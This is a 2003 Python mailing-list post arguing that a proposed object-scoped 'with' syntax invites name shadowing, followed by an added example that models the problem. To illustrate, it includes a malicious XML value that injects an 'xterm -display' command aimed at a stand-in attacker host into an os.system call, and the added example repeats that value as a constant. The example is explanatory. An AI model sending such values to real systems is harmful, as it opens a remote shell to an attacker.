Code block literals
Andrew Dalke
adalke at mindspring.com
Thu Oct 9 17:31:12 EDT 2003
Dave Benjamin:
> What's implicit to me is that the use of an iterator is never specified.
It is by the definition of what the for loop does.
> For instance, we could (and I'm *not* suggesting this) do this:
>
> iterator = file('input.txt')
> while iterator.has_next():
>     line = iterator.next()
>     do_something_with(line)
Good thing you aren't, since has_next might be impossible to
implement. ;)
> > If Python's syntax defined
> > other forms of suites, e.g. hypothetically:
> >
> > with <object>:
> >     <suite>
> >
> > meaning to call the object (or some given method[s] in it, whatever)
> > with the suite as its argument, it would be just as explicit as, e.g.:
> >
> > for <name> in <object>:
> >     <suite>
A reasonable point. However, inside the 'with' statement it's hard
to know if
print x
comes from the object or from the static scoping, and it may
be that 99.99% of the time it's from static scoping, only to find
after deployment that there's code like
logger = "echo got it >> file.log"
...
def parse_server_request(self, infile, outfile):
    obj = parse_XML_into_some_pythonic_data_structure(infile)
    with obj:
        outfile.write("Content-Type: text/plain\n\n")
        outfile.write("Hi, " + username + "\n")
        os.system(logger)
which lets malicious user input pass in XML with the content
<logger>xterm -display evil.machine.example.com:0</logger>
that ends up being passed to the system call.
I've been on this thread too long so I won't answer anything from the rest
of your response. :(
Andrew
dalke at dalkescientific.com
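The shadowing hazard Andrew sketches above, worked through as an added example that is not part of the original message. The hypothetical `with obj:` statement does not exist, so the block models its name resolution with `exec` over a namespace in which the request object's attributes are laid over the enclosing scope; `parse_request`, the `Request` attribute bag, the XML shape, and the stand-in for `os.system` are all assumptions made for the demonstration. A benign request behaves identically under both handlers, which is the "99.99% of the time" case; only the request carrying a `<logger>` element shows the difference.

```python
import xml.etree.ElementTree as ET

# Module-level name, exactly as in the post's sketch.
logger = "echo got it >> file.log"

# Constructed sample requests (not from the thread). The second one carries a
# <logger> element chosen by the sender, as in the post.
BENIGN_XML = "<request><username>alice</username></request>"
MALICIOUS_XML = (
    "<request>"
    "<username>alice</username>"
    "<logger>xterm -display evil.machine.example.com:0</logger>"
    "</request>"
)


class Request:
    """Attribute bag standing in for the result of the post's
    parse_XML_into_some_pythonic_data_structure (assumed shape)."""

    def __init__(self, **fields):
        self.__dict__.update(fields)


def parse_request(xml_text):
    """One attribute per child element; tag name becomes attribute name."""
    root = ET.fromstring(xml_text)
    return Request(**{child.tag: (child.text or "") for child in root})


def handle_with_object_scope(req):
    """Models the hypothetical 'with obj:' suite from the post: names used in
    the suite resolve against the object's attributes first and only then
    against the enclosing scope. Returns (response_body, command), where
    command is the string os.system would have received."""
    suite = (
        "out.append('Content-Type: text/plain\\n\\n')\n"
        "out.append('Hi, ' + username + '\\n')\n"
        "system(logger)\n"
    )
    out, commands = [], []
    scope = {"out": out, "system": commands.append, "logger": logger}
    scope.update(vars(req))  # dynamic binding: request fields shadow 'logger'
    exec(suite, scope)
    return "".join(out), commands[0]


def handle_explicit(req):
    """Same handler with ordinary lexical scoping: request fields are read as
    attributes, so 'logger' can only mean the module-level constant. Returns
    (response_body, command) for comparison; a real handler would append to
    file.log from Python rather than hand any string to a shell."""
    body = "Content-Type: text/plain\n\n" + "Hi, " + req.username + "\n"
    return body, logger


if __name__ == "__main__":
    for label, xml_text in (("benign", BENIGN_XML), ("malicious", MALICIOUS_XML)):
        req = parse_request(xml_text)
        print(label, "with-scope  ->", handle_with_object_scope(req)[1])
        print(label, "explicit    ->", handle_explicit(req)[1])
```

Under the modelled `with` semantics the benign request yields the module's echo command and the malicious one yields the xterm command; the explicit handler yields the echo command for both.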